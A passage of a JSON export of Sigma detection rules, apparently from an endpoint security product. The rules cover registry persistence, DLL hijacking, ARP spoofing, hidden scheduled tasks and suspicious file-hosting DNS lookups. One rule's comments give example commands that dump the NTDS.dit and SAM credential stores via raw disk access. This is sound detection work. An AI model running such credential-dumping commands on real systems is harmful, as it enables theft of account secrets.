Agent\\bin\\Heimdal.Wizard.exe'\n\n # https://github.com/rizonesoft/Notepad3\n exclusion_notepad3:\n ProcessProduct: 'Notepad3 (x64)'\n Details: '??:\\Program Files\\Notepad3\\Notepad3.exe? /z'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa59cb20-2517-4d55-8264-d52dc9608856",
"rule_name": "Image File Execution Option Persistence Added",
"rule_description": "Detects Image File Execution Option persistence settings in registry. This is oftenly used by threat actors to gain persistence on a machine.\nAttackers may use IFEO as persistence or as a backdoor if it is installed on system binaries that are triggered for specific actions.\nIt is recommended to analyze the process reponsible for this registry edit as well as to look for malicious actions by the same user around this alert.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa658529-bd7e-4971-a104-d32ba0e109a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089148Z",
"creation_date": "2026-03-23T11:45:34.089150Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089154Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/hhctrl.html",
"https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_hhctrl_ocx.yml",
"content": "title: Possible hhctrl.ocx Persistence Added\nid: aa658529-bd7e-4971-a104-d32ba0e109a3\ndescription: |\n Detects the modification of the hhctrl.ocx registry key that allows the setting of a DLL to load when using the hh.exe binary.\n This method is used as a mean to set up a persistence that will be triggered upon the execution of hh.exe.\n It is recommended to check the legitimacy of the process that added the persistence as well as to look for malicious content in the targeted DLL.\nreferences:\n - https://persistence-info.github.io/Data/hhctrl.html\n - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKCR\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)'\n\n is_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_hhctrl:\n Details: '?:\\Windows\\System32\\hhctrl.ocx'\n\n condition: selection and not is_empty and not 1 of exclusion_*\nlevel: medium\n# level: high (to discuss during review)\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa658529-bd7e-4971-a104-d32ba0e109a3",
"rule_name": "Possible hhctrl.ocx Persistence Added",
"rule_description": "Detects the modification of the hhctrl.ocx registry key that allows the setting of a DLL to load when using the hh.exe binary.\nThis method is used as a mean to set up a persistence that will be triggered upon the execution of hh.exe.\nIt is recommended to check the legitimacy of the process that added the persistence as well as to look for malicious content in the targeted DLL.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa913aec-a1b1-4c7b-91c0-1098693481c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295522Z",
"creation_date": "2026-03-23T11:45:35.295526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295532Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://twitter.com/embee_research/status/1623908375242350593",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_dns_request_filehosting_linux.yml",
"content": "title: DNS Request to Suspicious File Hosting Website (Linux)\nid: aa913aec-a1b1-4c7b-91c0-1098693481c7\ndescription: |\n Detects a DNS request to a public file hosting service that may contain a malicious payload.\n This technique has been used by ransomware operators to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://twitter.com/embee_research/status/1623908375242350593\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/07/15\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: dns_query\n product: linux\ndetection:\n selection:\n QueryName:\n - '*transfer.sh'\n - '*gofile.io'\n - '*file.io'\n - '*send.exploit.in'\n - '*catbox.moe'\n - 'temp.sh'\n\n filter_browser:\n ProcessImage|endswith:\n - '/firefox'\n - '/firefox-esr'\n - '/firefox-bin'\n - '/firefox-devedition'\n - '/chrome'\n - '/google-chrome'\n - '/google-chrome-stable'\n - '/brave'\n - '/msedge'\n - '/librewolf'\n - '/chromium'\n - '/vivaldi'\n\n filter_dns:\n ProcessCommandLine: 'samba: task[dns]*'\n\n filter_resolver:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n\n exclusion_amavis:\n - ProcessImage|endswith: '/amavisd-new'\n - ProcessCommandLine|contains:\n - '/amavisd (master)'\n - '/amavisd-new (master)'\n - '/usr/bin/perl -T /usr/sbin/amavisd'\n\n exclusion_zimbra:\n ProcessCommandLine: '/usr/bin/perl -T /opt/zimbra/common/sbin/amavisd * -c /opt/zimbra/conf/amavisd.conf'\n\n exclusion_squid:\n ProcessImage: '/usr/sbin/squid'\n\n exclusion_pdns:\n ProcessImage: '/usr/sbin/pdns_recursor'\n\n exclusion_traefik:\n ProcessImage:\n - '/usr/bin/traefik'\n - '/usr/local/bin/traefik'\n\n exclusion_mailscanner:\n ProcessCommandLine: 'MailScanner: starting child'\n\n exclusion_zen:\n ProcessImage: '/opt/zen/zen'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa913aec-a1b1-4c7b-91c0-1098693481c7",
"rule_name": "DNS Request to Suspicious File Hosting Website (Linux)",
"rule_description": "Detects a DNS request to a public file hosting service that may contain a malicious payload.\nThis technique has been used by ransomware operators to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2026-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa991822-87ec-4f97-961a-58f1bbd3db81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096995Z",
"creation_date": "2026-03-23T11:45:34.096997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097001Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_perfmon.yml",
"content": "title: DLL Hijacking via perfmon.exe\nid: aa991822-87ec-4f97-961a-58f1bbd3db81\ndescription: |\n Detects potential Windows DLL Hijacking via perfmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\credui.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa991822-87ec-4f97-961a-58f1bbd3db81",
"rule_name": "DLL Hijacking via perfmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via perfmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaab50b4-5994-431b-85e4-0c007a681a95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598828Z",
"creation_date": "2026-03-23T11:45:34.598831Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598839Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://en.wikipedia.org/wiki/ARP_spoofing",
"https://attack.mitre.org/techniques/T1557/002/",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_arpspoof.yml",
"content": "title: MITM ARP Spoofing via arpspoof\nid: aaab50b4-5994-431b-85e4-0c007a681a95\ndescription: |\n Detects a command-line related to the execution of arpspoof, a command-line utility for conducting ARP Spoofing.\n ARP Spoofing is a technique used by attackers to disguise as a particular host to other nodes on a network, redirecting any traffic meant for the spoofed host to the attacker.\n It is recommended to investigate any potentially malicious actions preceding the usage of arpspoof.\nreferences:\n - https://en.wikipedia.org/wiki/ARP_spoofing\n - https://attack.mitre.org/techniques/T1557/002/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/04/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1557.002\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Arpspoof\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arpspoof'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaab50b4-5994-431b-85e4-0c007a681a95",
"rule_name": "MITM ARP Spoofing via arpspoof",
"rule_description": "Detects a command-line related to the execution of arpspoof, a command-line utility for conducting ARP Spoofing.\nARP Spoofing is a technique used by attackers to disguise as a particular host to other nodes on a network, redirecting any traffic meant for the spoofed host to the attacker.\nIt is recommended to investigate any potentially malicious actions preceding the usage of arpspoof.\n",
"rule_creation_date": "2024-04-16",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aad46f4b-8e71-412f-bea5-fa2d12a23f66",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623108Z",
"creation_date": "2026-03-23T11:45:34.623111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_hidden_scheduled_task.yml",
"content": "title: Suspicious Hidden Scheduled Task Created\nid: aad46f4b-8e71-412f-bea5-fa2d12a23f66\ndescription: |\n Detects the creation of a hidden scheduled task by a suspicious process.\n This technique is commonly used by attackers to hide the presence of a scheduled task.\n It is recommended to investigate the source of the scheduled task creation and review the task content and command-line for malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.lateral_movement\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType: 'create'\n TaskHidden: 'true'\n ProcessImage|contains: '?'\n\n filter_signed:\n ProcessSigned: 'true'\n\n filter_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_legitimate_target:\n TaskCommands|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_pdf_creator:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\pdf*_creator_update.tmp'\n\n exclusion_genericupdater:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\bin\\updater.exe'\n TaskName|startswith: '\\\\*User\\\\*Updater\\\\*UpdaterTaskUser'\n\n exclusion_viota:\n ProcessImage|endswith: '\\Viota Database Update Tool\\ViotaDatabaseUpdateTool*.exe'\n TaskName: '\\\\*Viota Database Update Tool_ViotaDatabaseUpdateTool*.exe'\n\n exclusion_fresenius_kabi:\n ProcessImage|endswith: '\\Vigilant Master Med Device Uploader.exe'\n TaskName: '\\\\{????????-????-????-????-????????????}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aad46f4b-8e71-412f-bea5-fa2d12a23f66",
"rule_name": "Suspicious Hidden Scheduled Task Created",
"rule_description": "Detects the creation of a hidden scheduled task by a suspicious process.\nThis technique is commonly used by attackers to hide the presence of a scheduled task.\nIt is recommended to investigate the source of the scheduled task creation and review the task content and command-line for malicious activity.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaed74be-3771-4ce8-82e7-f04d9c90c5f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080827Z",
"creation_date": "2026-03-23T11:45:34.080829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmagent.yml",
"content": "title: DLL Hijacking via MDMAgent.exe\nid: aaed74be-3771-4ce8-82e7-f04d9c90c5f3\ndescription: |\n Detects potential Windows DLL Hijacking via MDMAgent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MDMAgent'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmenrollengine.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaed74be-3771-4ce8-82e7-f04d9c90c5f3",
"rule_name": "DLL Hijacking via MDMAgent.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MDMAgent.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaf113bc-6b63-46d3-919a-9b2a105bcd5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071165Z",
"creation_date": "2026-03-23T11:45:34.071167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071171Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/jschicht/RawCopy",
"http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html",
"https://attack.mitre.org/techniques/T1006/",
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1006_raw_access_sensitive_files.yml",
"content": "title: Sensitive Files Accessed via Raw Device Access\nid: aaf113bc-6b63-46d3-919a-9b2a105bcd5f\ndescription: |\n Detects the access to sensitive files via raw disk access through tools like RawCopy or FGET.\n Attackers can dump sensitive files via raw disk access to evade detection mechanisms or to bypass locked files.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2022/10/19\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n condition: 1 of selection_* and sensitive_files\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaf113bc-6b63-46d3-919a-9b2a105bcd5f",
"rule_name": "Sensitive Files Accessed via Raw Device Access",
"rule_description": "Detects the access to sensitive files via raw disk access through tools like RawCopy or FGET.\nAttackers can dump sensitive files via raw disk access to evade detection mechanisms or to bypass locked files.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab33962d-497b-42af-9f9a-0096d48d2791",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606726Z",
"creation_date": "2026-03-23T11:45:34.606729Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606737Z",
